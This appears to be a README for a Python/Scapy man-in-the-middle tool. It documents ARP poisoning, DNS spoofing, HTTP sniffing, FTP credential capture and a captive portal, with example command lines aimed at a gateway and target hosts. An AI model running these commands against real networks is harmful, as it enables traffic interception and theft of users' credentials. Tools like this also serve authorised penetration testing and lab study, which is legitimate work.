mitm.py
Tool developed in Python 3 using Scapy for MITM attacks
Project Structure | Installation | Configuring | Examples
π Project Structure
mitm.py
βββ include
| βββ arppoison.py
| βββ ftp_sniff.py
| βββ http_sniff.py
βββ requirements.txt
βββ mitm.py
Attacks
- ARP Poisoning
- FTP Sniffing
- HTTP Sniffing
- DNS Spoofing
- Captive Portal
βοΈ Installation
To learn how to install the script, see the wiki Installation
βοΈ Configuring
To configure the hosts for DNS Spoofing attacks, you need to change the config/hosts.json, following these instructions:
{
"kali.ada.": "192.168.1.105",
"test.root.": "192.168.1.105"
}
Set the key name as the host, and the value as the IP to be redirected. And remember to add the '.' at the end.
π Examples
- Poisoning the ARP and executing DNS Spoofing
python3 mitm.py --arp --dns --gateway 192.168.1.1 --targets 192.168.1.106/192.168.1.104
Remember to change the
config/hosts.json
file
- Sniffing all http requests
python3 mitm.py --http -v
All requests will be saved at
files
directory
- Sniffing all FTP credentials
python3 mitm.py --ftp -v
All credentials will be saved at
files
directory
- Enable Captive Portal
python3 mitm.py --arp --dns --captive --gateway 192.168.1.1 --targets 192.168.1.106
Redirects all requests to your captive portal